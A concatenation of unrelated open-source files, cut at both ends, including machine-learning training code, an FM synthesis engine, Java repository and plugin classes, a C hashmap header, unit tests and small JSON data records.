        self.loss_evaluator = make_roi_mask_loss_evaluator(cfg)

    def forward(self, features, proposals, targets=None):
        """
        Arguments:
            features (list[Tensor]): feature-maps from possibly several levels
            proposals (list[BoxList]): proposal boxes
            targets (list[BoxList], optional): the ground-truth targets.

        Returns:
            x (Tensor): the result of the feature extractor
            proposals (list[BoxList]): during training, the original proposals
                are returned. During testing, the predicted boxlists are returned
                with the `mask` field set
            losses (dict[Tensor]): During training, returns the losses for the
                head. During testing, returns an empty dict.
        """
        if self.training:
            # during training, only focus on positive boxes
            all_proposals = proposals
            proposals, positive_inds = keep_only_positive_boxes(proposals)
        if self.training and self.cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR:
            x = features
            x = x[torch.cat(positive_inds, dim=0)]
        else:
            x = self.feature_extractor(features, proposals)
        mask_logits = self.predictor(x)

        if not self.training:
            result = self.post_processor(mask_logits, proposals)
            return x, result, {}

        loss_mask = self.loss_evaluator(proposals, mask_logits, targets)

        return x, all_proposals, dict(loss_mask=loss_mask)


def build_roi_mask_head(cfg, in_channels):
    return ROIMaskHead(cfg, in_channels)
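# Minimal usage sketch (illustrative only) for keep_only_positive_boxes defined
# above. It assumes the maskrcnn-benchmark-style BoxList API that mega_core
# mirrors -- BoxList(bbox_tensor, image_size, mode) plus add_field() -- and that
# keep_only_positive_boxes from the module above is in scope; those assumptions
# are not taken from this file.
import torch
from mega_core.structures.bounding_box import BoxList

boxes = BoxList(torch.tensor([[0., 0., 10., 10.],
                              [5., 5., 20., 20.]]), (50, 50), mode="xyxy")
boxes.add_field("labels", torch.tensor([0, 3]))  # first box is background (label 0)

positive_boxes, positive_inds = keep_only_positive_boxes([boxes])
# positive_boxes[0] keeps only the second box; positive_inds[0] is the mask [False, True]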
// Copyright 2016 <NAME>. // // Author: <NAME> (<EMAIL>) // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // // See http://creativecommons.org/licenses/MIT/ for more information. // // ----------------------------------------------------------------------------- // // Classic 2-op FM found in Braids, Rings and Elements. #include "plaits/dsp/engine/fm_engine.h" #include "stmlib/dsp/parameter_interpolator.h" #include "plaits/resources.h" namespace plaits { using namespace stmlib; void FMEngine::Init(BufferAllocator* allocator) { carrier_phase_ = 0; modulator_phase_ = 0; sub_phase_ = 0; previous_carrier_frequency_ = a0; previous_modulator_frequency_ = a0; previous_amount_ = 0.0f; previous_feedback_ = 0.0f; previous_sample_ = 0.0f; } void FMEngine::Reset() { } inline float FMEngine::SinePM(uint32_t phase, float fm) const { phase += (static_cast<uint32_t>((fm + 4.0f) * 536870912.0f)) << 3; uint32_t integral = phase >> 22; float fractional = static_cast<float>(phase << 10) / 4294967296.0f; float a = lut_sine[integral]; float b = lut_sine[integral + 1]; return a + (b - a) * fractional; } const size_t kOversampling = 4; const size_t kFirHalfSize = 4; static const float fir_coefficient[kFirHalfSize] = { 0.02442415f, 0.09297315f, 0.16712938f, 0.21547332f, }; class Downsampler { public: Downsampler(float* state) { head_ = *state; tail_ = 0.0f; state_ = state; } ~Downsampler() { *state_ = head_; } inline void Accumulate(int i, float sample) { head_ += sample * fir_coefficient[3 - (i & 3)]; tail_ += sample * fir_coefficient[i & 3]; } inline float Read() { float value = head_; head_ = tail_; tail_ = 0.0f; return value; } private: float head_; float tail_; float* state_; DISALLOW_COPY_AND_ASSIGN(Downsampler); }; void FMEngine::Render( const EngineParameters& parameters, float* out, float* aux, size_t size, bool* already_enveloped) { // 4x oversampling const float note = parameters.note - 24.0f; const float ratio = Interpolate( lut_fm_frequency_quantizer, parameters.harmonics, 128.0f); float modulator_note = note + ratio; float target_modulator_frequency = NoteToFrequency(modulator_note); CONSTRAIN(target_modulator_frequency, 0.0f, 0.5f); // Reduce the maximum FM index for high pitched notes, to prevent aliasing. 
float hf_taming = 1.0f - (modulator_note - 72.0f) * 0.025f; CONSTRAIN(hf_taming, 0.0f, 1.0f); hf_taming *= hf_taming; ParameterInterpolator carrier_frequency( &previous_carrier_frequency_, NoteToFrequency(note), size); ParameterInterpolator modulator_frequency( &previous_modulator_frequency_, target_modulator_frequency, size); ParameterInterpolator amount_modulation( &previous_amount_, 2.0f * parameters.timbre * parameters.timbre * hf_taming, size); ParameterInterpolator feedback_modulation( &previous_feedback_, 2.0f * parameters.morph - 1.0f, size); Downsampler carrier_downsampler(&carrier_fir_); Downsampler sub_downsampler(&sub_fir_); while (size--) { const float amount = amount_modulation.Next(); const float feedback = feedback_modulation.Next(); float phase_feedback = feedback < 0.0f ? 0.5f * feedback * feedback : 0.0f; const uint32_t carrier_increment = static_cast<uint32_t>( 4294967296.0f * carrier_frequency.Next()); float _modulator_frequency = modulator_frequency.Next(); for (size_t j = 0; j < kOversampling; ++j) { modulator_phase_ += static_cast<uint32_t>(4294967296.0f * \ _modulator_frequency * (1.0f + previous_sample_ * phase_feedback)); carrier_phase_ += carrier_increment; sub_phase_ += carrier_increment >> 1; float modulator_fb = feedback > 0.0f ? 0.25f * feedback * feedback : 0.0f; float modulator = SinePM( modulator_phase_, modulator_fb * previous_sample_); float carrier = SinePM(carrier_phase_, amount * modulator); float sub = SinePM(sub_phase_, amount * carrier * 0.25f); ONE_POLE(previous_sample_, carrier, 0.05f); carrier_downsampler.Accumulate(j, carrier); sub_downsampler.Accumulate(j, sub); } *out++ = carrier_downsampler.Read(); *aux++ = sub_downsampler.Read(); } } } // namespace plaits
// src/apps/launchbox/NamePanel.h
/*
 * Copyright 2006-2011, <NAME> <<EMAIL>>.
 * All rights reserved. Distributed under the terms of the MIT License.
 */
#ifndef NAME_PANEL_H
#define NAME_PANEL_H

#include "Panel.h"

class BTextControl;

class NamePanel : public Panel {
public:
    NamePanel(const char* label, const char* text,
        BWindow* window, BHandler* target,
        BMessage* message, const BSize& size);
    virtual ~NamePanel();

    virtual void MessageReceived(BMessage *message);

private:
    BTextControl*   fNameTC;
    BWindow*        fWindow;
    BHandler*       fTarget;
    BMessage*       fMessage;
    window_feel     fSavedTargetWindowFeel;
};

#endif // NAME_PANEL_H
<filename>core/core/src/main/java/io/lumify/core/model/artifactThumbnails/ArtifactThumbnailRepository.java package io.lumify.core.model.artifactThumbnails; import com.altamiracorp.bigtable.model.ModelSession; import com.altamiracorp.bigtable.model.Repository; import com.altamiracorp.bigtable.model.Row; import io.lumify.core.exception.LumifyResourceNotFoundException; import io.lumify.core.model.ontology.OntologyRepository; import io.lumify.core.model.properties.types.BooleanLumifyProperty; import io.lumify.core.model.properties.types.IntegerLumifyProperty; import io.lumify.core.user.User; import io.lumify.core.util.LumifyLogger; import io.lumify.core.util.LumifyLoggerFactory; import org.securegraph.Vertex; import javax.imageio.ImageIO; import java.awt.*; import java.awt.image.BufferedImage; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import static com.google.common.base.Preconditions.checkNotNull; public abstract class ArtifactThumbnailRepository extends Repository<BigTableArtifactThumbnail> { private static final LumifyLogger LOGGER = LumifyLoggerFactory.getLogger(ArtifactThumbnailRepository.class); public static int FRAMES_PER_PREVIEW = 20; public static int PREVIEW_FRAME_WIDTH = 360; public static int PREVIEW_FRAME_HEIGHT = 240; private BooleanLumifyProperty yAxisFlippedProperty; private IntegerLumifyProperty clockwiseRotationProperty; public ArtifactThumbnailRepository(ModelSession modelSession, final OntologyRepository ontologyRepository) { super(modelSession); String yAxisFlippedPropertyIri = ontologyRepository.getPropertyIRIByIntent("media.yAxisFlipped"); if (yAxisFlippedPropertyIri != null) { this.yAxisFlippedProperty = new BooleanLumifyProperty(yAxisFlippedPropertyIri); } String clockwiseRotationPropertyIri = ontologyRepository.getPropertyIRIByIntent("media.clockwiseRotation"); if (clockwiseRotationPropertyIri != null) { this.clockwiseRotationProperty = new IntegerLumifyProperty(clockwiseRotationPropertyIri); } } public abstract BigTableArtifactThumbnail fromRow(Row row); public abstract Row toRow(BigTableArtifactThumbnail artifactThumbnail); public abstract String getTableName(); public abstract ArtifactThumbnail getThumbnail(Object artifactVertexId, String thumbnailType, int width, int height, User user); public abstract byte[] getThumbnailData(Object artifactVertexId, String thumbnailType, int width, int height, User user); public abstract ArtifactThumbnail createThumbnail(Vertex artifactVertex, String thumbnailType, InputStream in, int[] boundaryDims, User user) throws IOException; public ArtifactThumbnail generateThumbnail(Vertex artifactVertex, InputStream in, int[] boundaryDims) { ByteArrayOutputStream out = new ByteArrayOutputStream(); String format; int type; try { BufferedImage originalImage = ImageIO.read(in); checkNotNull(originalImage, "Could not generateThumbnail: read original image for artifact " + artifactVertex.getId()); type = ImageUtils.thumbnailType(originalImage); format = ImageUtils.thumbnailFormat(originalImage); BufferedImage transformedImage = getTransformedImage(originalImage, artifactVertex); //Get new image dimensions, which will be used for the icon. 
int[] transformedImageDims = new int[]{transformedImage.getWidth(), transformedImage.getHeight()}; int[] newImageDims = getScaledDimension(transformedImageDims, boundaryDims); if (newImageDims[0] >= transformedImageDims[0] || newImageDims[1] >= transformedImageDims[1]) { LOGGER.info("Original image dimensions %d x %d are smaller " + "than requested dimensions %d x %d returning original.", transformedImageDims[0], transformedImageDims[1], newImageDims[0], newImageDims[1]); } //Resize the image. BufferedImage resizedImage = new BufferedImage(newImageDims[0], newImageDims[1], type); Graphics2D g = resizedImage.createGraphics(); if (transformedImage.getColorModel().getNumComponents() > 3) { g.drawImage(transformedImage, 0, 0, resizedImage.getWidth(), resizedImage.getHeight(), null); } else { g.drawImage(transformedImage, 0, 0, resizedImage.getWidth(), resizedImage.getHeight(), Color.BLACK, null); } g.dispose(); //Write the bufferedImage to a file. ImageIO.write(resizedImage, format, out); } catch (IOException e) { throw new LumifyResourceNotFoundException("Error reading inputstream"); } return new ArtifactThumbnail(out.toByteArray(), type, format); } public BufferedImage getTransformedImage(BufferedImage originalImage, Vertex artifactVertex) { int cwRotationNeeded = 0; if (clockwiseRotationProperty != null) { Integer nullable = clockwiseRotationProperty.getPropertyValue(artifactVertex); if (nullable != null) { cwRotationNeeded = nullable; } } boolean yAxisFlipNeeded = false; if (yAxisFlippedProperty != null) { Boolean nullable = yAxisFlippedProperty.getPropertyValue(artifactVertex); if (nullable != null) { yAxisFlipNeeded = nullable; } } //Rotate and flip image. return ImageUtils.reOrientImage(originalImage, yAxisFlipNeeded, cwRotationNeeded); } public int[] getScaledDimension(int[] imgSize, int[] boundary) { int originalWidth = imgSize[0]; int originalHeight = imgSize[1]; int boundWidth = boundary[0]; int boundHeight = boundary[1]; int newWidth = originalWidth; int newHeight = originalHeight; if (originalWidth > boundWidth) { newWidth = boundWidth; newHeight = (newWidth * originalHeight) / originalWidth; } if (newHeight > boundHeight) { newHeight = boundHeight; newWidth = (newHeight * originalWidth) / originalHeight; } return new int[]{newWidth, newHeight}; } }
<filename>examples/action_dann_lightn/main.py<gh_stars>100-1000 """This example is about domain adaptation for action recognition, using PyTorch Lightning. Reference: https://github.com/thuml/CDAN/blob/master/pytorch/train_image.py """ import argparse import logging import pytorch_lightning as pl from config import get_cfg_defaults from model import get_model from pytorch_lightning import loggers as pl_loggers from pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint, TQDMProgressBar from kale.loaddata.video_access import VideoDataset from kale.loaddata.video_multi_domain import VideoMultiDomainDatasets from kale.utils.seed import set_seed # from pytorch_lightning.callbacks.early_stopping import EarlyStopping def arg_parse(): """Parsing arguments""" parser = argparse.ArgumentParser(description="Domain Adversarial Networks on Action Datasets") parser.add_argument("--cfg", required=True, help="path to config file", type=str) parser.add_argument( "--gpus", default=1, help="gpu id(s) to use. None/int(0) for cpu. list[x,y] for xth, yth GPU." "str(x) for the first x GPUs. str(-1)/int(-1) for all available GPUs", ) parser.add_argument("--resume", default="", type=str) args = parser.parse_args() return args def main(): """The main for this domain adaptation example, showing the workflow""" args = arg_parse() # ---- setup configs ---- cfg = get_cfg_defaults() cfg.merge_from_file(args.cfg) cfg.freeze() print(cfg) # ---- setup output ---- format_str = "@%(asctime)s %(name)s [%(levelname)s] - (%(message)s)" logging.basicConfig(format=format_str) # ---- setup dataset ---- seed = cfg.SOLVER.SEED source, target, num_classes = VideoDataset.get_source_target( VideoDataset(cfg.DATASET.SOURCE.upper()), VideoDataset(cfg.DATASET.TARGET.upper()), seed, cfg ) dataset = VideoMultiDomainDatasets( source, target, image_modality=cfg.DATASET.IMAGE_MODALITY, seed=seed, config_weight_type=cfg.DATASET.WEIGHT_TYPE, config_size_type=cfg.DATASET.SIZE_TYPE, ) # ---- training/test process ---- ### Repeat multiple times to get std for i in range(0, cfg.DATASET.NUM_REPEAT): seed = seed + i * 10 set_seed(seed) # seed_everything in pytorch_lightning did not set torch.backends.cudnn print(f"==> Building model for seed {seed} ......") # ---- setup model and logger ---- model, train_params = get_model(cfg, dataset, num_classes) tb_logger = pl_loggers.TensorBoardLogger(cfg.OUTPUT.TB_DIR, name="seed{}".format(seed)) checkpoint_callback = ModelCheckpoint( # dirpath=full_checkpoint_dir, filename="{epoch}-{step}-{val_loss:.4f}", # save_last=True, # save_top_k=1, monitor="val_loss", mode="min", ) ### Set early stopping # early_stop_callback = EarlyStopping(monitor="val_target_acc", min_delta=0.0000, patience=100, mode="max") lr_monitor = LearningRateMonitor(logging_interval="epoch") progress_bar = TQDMProgressBar(cfg.OUTPUT.PB_FRESH) ### Set the lightning trainer. Comment `limit_train_batches`, `limit_val_batches`, `limit_test_batches` when # training. Uncomment and change the ratio to test the code on the smallest sub-dataset for efficiency in # debugging. Uncomment early_stop_callback to activate early stopping. 
trainer = pl.Trainer( min_epochs=cfg.SOLVER.MIN_EPOCHS, max_epochs=cfg.SOLVER.MAX_EPOCHS, # resume_from_checkpoint=last_checkpoint_file, gpus=args.gpus, logger=tb_logger, # logger, # weights_summary='full', fast_dev_run=cfg.OUTPUT.FAST_DEV_RUN, # True, callbacks=[lr_monitor, checkpoint_callback, progress_bar], # callbacks=[early_stop_callback, lr_monitor], # limit_train_batches=0.005, # limit_val_batches=0.06, # limit_test_batches=0.06, ) ### Find learning_rate # lr_finder = trainer.tuner.lr_find(model, max_lr=0.1, min_lr=1e-6) # fig = lr_finder.plot(suggest=True) # fig.show() # logging.info(lr_finder.suggestion()) ### Training/validation process trainer.fit(model) ### Test process trainer.test() if __name__ == "__main__": main()
<gh_stars>100-1000 { "name": "Kuler", "description": "A web service for generating colour palettes.", "url": "https://en.wikipedia.org/wiki/Adobe_Kuler" }
{"nom":"Saint-Caprais-de-Lerm","circ":"1ère circonscription","dpt":"Lot-et-Garonne","inscrits":516,"abs":268,"votants":248,"blancs":27,"nuls":13,"exp":208,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":107},{"nuance":"UDI","nom":"<NAME>","voix":101}]}
import numpy as np
import pytest

from alibi_detect.cd import MMDDrift
from alibi_detect.cd.pytorch.mmd import MMDDriftTorch
from alibi_detect.cd.tensorflow.mmd import MMDDriftTF

n, n_features = 100, 5

tests_mmddrift = ['tensorflow', 'pytorch', 'PyToRcH', 'mxnet']
n_tests = len(tests_mmddrift)


@pytest.fixture
def mmddrift_params(request):
    return tests_mmddrift[request.param]


@pytest.mark.parametrize('mmddrift_params', list(range(n_tests)), indirect=True)
def test_mmddrift(mmddrift_params):
    backend = mmddrift_params
    x_ref = np.random.randn(*(n, n_features))

    try:
        cd = MMDDrift(x_ref=x_ref, backend=backend)
    except NotImplementedError:
        cd = None

    if backend.lower() == 'pytorch':
        assert isinstance(cd._detector, MMDDriftTorch)
    elif backend.lower() == 'tensorflow':
        assert isinstance(cd._detector, MMDDriftTF)
    else:
        assert cd is None
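# Minimal end-to-end sketch (illustrative only) for the MMDDrift detector that the
# test above instantiates. The p_val argument and the structure of the predict()
# return value follow the public alibi-detect API and are assumptions here, not
# taken from this test file.
import numpy as np
from alibi_detect.cd import MMDDrift

x_ref = np.random.randn(100, 5)            # reference data the detector is configured with
x_test = np.random.randn(100, 5) + 1.0     # shifted batch that should be flagged as drift

cd = MMDDrift(x_ref=x_ref, backend='pytorch', p_val=0.05)
preds = cd.predict(x_test)
print(preds['data']['is_drift'], preds['data']['p_val'])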
{
  "name": "WorkForce 545",
  "description": "An all-in-one printer, copier, scanner, and fax.",
  "url": "https://www.amazon.com/Epson-WorkForce-Smartphone-Compatible-C11CB88201/dp/B005IVL0ZK"
}
//--------------------------------------------------------------------------------------------------------------------// // // // Tuplex: Blazing Fast Python Data Science // // // // // // (c) 2017 - 2021, Tuplex team // // Created by <NAME> on 1/1/2021 // // License: Apache 2.0 // //--------------------------------------------------------------------------------------------------------------------// #ifndef __INT_HASHMAP_H__ #define __INT_HASHMAP_H__ // C guard #ifdef __cplusplus extern "C" { #endif #include <cstdint> #include <cstdlib> #define MAP_MISSING -3 /* No such element */ #define MAP_FULL -2 /* Hashmap is full */ #define MAP_OMEM -1 /* Out of Memory */ #define MAP_OK 0 /* OK */ /* * int64_any_t is a pointer. This allows you to put arbitrary structures in * the hashmap. */ typedef void *int64_any_t; // TODO: probably pull this out to a common header for both hashtables /* We need to keep keys and values */ typedef struct _int_hashmap_element { uint64_t key; int in_use; int64_any_t data; } int64_hashmap_element; /* * PFany is a pointer to a function that can take two int64_any_t arguments * and return an integer. Returns status code.. */ typedef int (*PFintany)(int64_any_t, int64_hashmap_element*); /* * map_t is a pointer to an internally maintained data structure. * Clients of this package do not need to know how hashmaps are * represented. They see and manipulate only map_t's. */ typedef int64_any_t map_t; /* * Return an empty hashmap. Returns NULL if empty. */ extern map_t int64_hashmap_new() __attribute__((used)); /* * Iteratively call f with argument (item, data) for * each element data in the hashmap. The function must * return a map status code. If it returns anything other * than MAP_OK the traversal is terminated. f must * not reenter any hashmap functions, or deadlock may arise. */ extern int int64_hashmap_iterate(map_t in, PFintany f, int64_any_t item) __attribute__((used)); /*! * calls free(...) on both key and data. Should be followed by hashmap_free call * @param in hashmap * @return MAP_OK */ extern int int64_hashmap_free_key_and_data(map_t in) __attribute__((used)); /* * Add an element to the hashmap. Return MAP_OK or MAP_OMEM. */ extern int int64_hashmap_put(map_t in, uint64_t key, int64_any_t value) __attribute__((used)); /* * put into hashmap, avoid strlen call */ extern int int64_hashmap_fastput(map_t in, uint64_t key, int64_any_t value) __attribute__((used)); /* * Get an element from the hashmap. Return MAP_OK or MAP_MISSING. */ extern int int64_hashmap_get(map_t in, uint64_t key, int64_any_t *arg) __attribute__((used)); /* * Remove an element from the hashmap. Return MAP_OK or MAP_MISSING. */ extern int int64_hashmap_remove(map_t in, uint64_t key) __attribute__((used)); /* * Get any element. Return MAP_OK or MAP_MISSING. * remove - should the element be removed from the hashmap */ extern int int64_hashmap_get_one(map_t in, int64_any_t *arg, int remove) __attribute__((used)); /* * Free the hashmap */ extern void int64_hashmap_free(map_t in) __attribute__((used)); /* * Get the current size of a hashmap */ extern int int64_hashmap_length(map_t in) __attribute__((used)); /*! 
* return how many buckets are used * @param in * @return how many buckets are used */ extern std::size_t int64_hashmap_bucket_count(map_t in) __attribute__((used)); extern unsigned long int64_hashmap_hash(uint64_t key); typedef int int64_hashmap_iterator_t; extern bool int64_hashmap_get_next_key(map_t in, int64_hashmap_iterator_t *it, uint64_t *key) __attribute__((used)); // C guard #ifdef __cplusplus } #endif #endif
/* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.tez.serviceplugins.api; import java.util.Arrays; import org.apache.tez.common.Preconditions; import org.apache.hadoop.classification.InterfaceAudience; import org.apache.hadoop.classification.InterfaceStability; import org.apache.tez.dag.api.TezConfiguration; /** * An {@link ServicePluginsDescriptor} describes the list of plugins running within the AM for * sourcing resources, launching and executing work. */ @InterfaceAudience.Public @InterfaceStability.Unstable public class ServicePluginsDescriptor { private final boolean enableContainers; private final boolean enableUber; private TaskSchedulerDescriptor[] taskSchedulerDescriptors; private ContainerLauncherDescriptor[] containerLauncherDescriptors; private TaskCommunicatorDescriptor[] taskCommunicatorDescriptors; private ServicePluginsDescriptor(boolean enableContainers, boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptors, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { this.enableContainers = enableContainers; this.enableUber = enableUber; Preconditions.checkArgument(taskSchedulerDescriptors == null || taskSchedulerDescriptors.length > 0, "TaskSchedulerDescriptors should either not be specified or at least 1 should be provided"); this.taskSchedulerDescriptors = taskSchedulerDescriptors; Preconditions.checkArgument(containerLauncherDescriptors == null || containerLauncherDescriptors.length > 0, "ContainerLauncherDescriptor should either not be specified or at least 1 should be provided"); this.containerLauncherDescriptors = containerLauncherDescriptors; Preconditions.checkArgument(taskCommunicatorDescriptors == null || taskCommunicatorDescriptors.length > 0, "TaskCommunicatorDescriptors should either not be specified or at least 1 should be provided"); this.taskCommunicatorDescriptors = taskCommunicatorDescriptors; } /** * Create a service plugin descriptor with the provided plugins. Regular containers will also be enabled * when using this method. * * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(true, false, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor with the provided plugins. Also allows specification of whether * in-AM execution is enabled. Container execution is enabled by default. * * Note on Uber mode: This is NOT fully supported at the moment. 
Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. * TODO: TEZ-2722 * * @param enableUber whether to enable execution in the AM or not * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(true, enableUber, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor with the provided plugins. Also allows specification of whether * container execution and in-AM execution will be enabled. * * Note on Uber mode: This is NOT fully supported at the moment. Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. * TODO: TEZ-2722 * * @param enableContainers whether to enable execution in containers * @param enableUber whether to enable execution in the AM or not * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableContainers, boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(enableContainers, enableUber, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor which may have in-AM execution of tasks enabled. Container * execution is enabled by default * * Note on Uber mode: This is NOT fully supported at the moment. Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. 
* TODO: TEZ-2722 * * @param enableUber whether to enable execution in the AM or not * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableUber) { return new ServicePluginsDescriptor(true, enableUber, null, null, null); } @InterfaceAudience.Private public boolean areContainersEnabled() { return enableContainers; } @InterfaceAudience.Private public boolean isUberEnabled() { return enableUber; } @InterfaceAudience.Private public TaskSchedulerDescriptor[] getTaskSchedulerDescriptors() { return taskSchedulerDescriptors; } @InterfaceAudience.Private public ContainerLauncherDescriptor[] getContainerLauncherDescriptors() { return containerLauncherDescriptors; } @InterfaceAudience.Private public TaskCommunicatorDescriptor[] getTaskCommunicatorDescriptors() { return taskCommunicatorDescriptors; } @Override public String toString() { return "ServicePluginsDescriptor{" + "enableContainers=" + enableContainers + ", enableUber=" + enableUber + ", taskSchedulerDescriptors=" + Arrays.toString(taskSchedulerDescriptors) + ", containerLauncherDescriptors=" + Arrays.toString(containerLauncherDescriptors) + ", taskCommunicatorDescriptors=" + Arrays.toString(taskCommunicatorDescriptors) + '}'; } }
<gh_stars>1000+ /* * Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH * under one or more contributor license agreements. See the NOTICE file * distributed with this work for additional information regarding copyright * ownership. Camunda licenses this file to you under the Apache License, * Version 2.0; you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.camunda.bpm.model.xml.testmodel.instance; import static org.assertj.core.api.Assertions.assertThat; import static org.camunda.bpm.model.xml.testmodel.TestModelConstants.MODEL_NAMESPACE; import static org.junit.Assert.fail; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.List; import org.camunda.bpm.model.xml.ModelInstance; import org.camunda.bpm.model.xml.ModelValidationException; import org.camunda.bpm.model.xml.impl.parser.AbstractModelParser; import org.camunda.bpm.model.xml.testmodel.Gender; import org.camunda.bpm.model.xml.testmodel.TestModelParser; import org.camunda.bpm.model.xml.testmodel.TestModelTest; import org.junit.Before; import org.junit.Test; import org.junit.runners.Parameterized.Parameters; /** * @author <NAME> */ public class AnimalTest extends TestModelTest { private Animal tweety; private Animal hedwig; private Animal birdo; private Animal plucky; private Animal fiffy; private Animal timmy; private Animal daisy; private RelationshipDefinition hedwigRelationship; private RelationshipDefinition birdoRelationship; private RelationshipDefinition pluckyRelationship; private RelationshipDefinition fiffyRelationship; private RelationshipDefinition timmyRelationship; private RelationshipDefinition daisyRelationship; public AnimalTest(String testName, ModelInstance testModelInstance, AbstractModelParser modelParser) { super(testName, testModelInstance, modelParser); } @Parameters(name="Model {0}") public static Collection<Object[]> models() { Object[][] models = {createModel(), parseModel(AnimalTest.class)}; return Arrays.asList(models); } public static Object[] createModel() { TestModelParser modelParser = new TestModelParser(); ModelInstance modelInstance = modelParser.getEmptyModel(); Animals animals = modelInstance.newInstance(Animals.class); modelInstance.setDocumentElement(animals); // add a tns namespace prefix for QName testing animals.getDomElement().registerNamespace("tns", MODEL_NAMESPACE); Animal tweety = createBird(modelInstance, "tweety", Gender.Female); Animal hedwig = createBird(modelInstance, "hedwig", Gender.Male); Animal birdo = createBird(modelInstance, "birdo", Gender.Female); Animal plucky = createBird(modelInstance, "plucky", Gender.Unknown); Animal fiffy = createBird(modelInstance, "fiffy", Gender.Female); createBird(modelInstance, "timmy", Gender.Male); createBird(modelInstance, "daisy", Gender.Female); // create and add some relationships RelationshipDefinition hedwigRelationship = createRelationshipDefinition(modelInstance, hedwig, ChildRelationshipDefinition.class); addRelationshipDefinition(tweety, hedwigRelationship); RelationshipDefinition birdoRelationship = 
createRelationshipDefinition(modelInstance, birdo, ChildRelationshipDefinition.class); addRelationshipDefinition(tweety, birdoRelationship); RelationshipDefinition pluckyRelationship = createRelationshipDefinition(modelInstance, plucky, FriendRelationshipDefinition.class); addRelationshipDefinition(tweety, pluckyRelationship); RelationshipDefinition fiffyRelationship = createRelationshipDefinition(modelInstance, fiffy, FriendRelationshipDefinition.class); addRelationshipDefinition(tweety, fiffyRelationship); tweety.getRelationshipDefinitionRefs().add(hedwigRelationship); tweety.getRelationshipDefinitionRefs().add(birdoRelationship); tweety.getRelationshipDefinitionRefs().add(pluckyRelationship); tweety.getRelationshipDefinitionRefs().add(fiffyRelationship); tweety.getBestFriends().add(birdo); tweety.getBestFriends().add(plucky); return new Object[]{"created", modelInstance, modelParser}; } @Before public void copyModelInstance() { modelInstance = cloneModelInstance(); tweety = modelInstance.getModelElementById("tweety"); hedwig = modelInstance.getModelElementById("hedwig"); birdo = 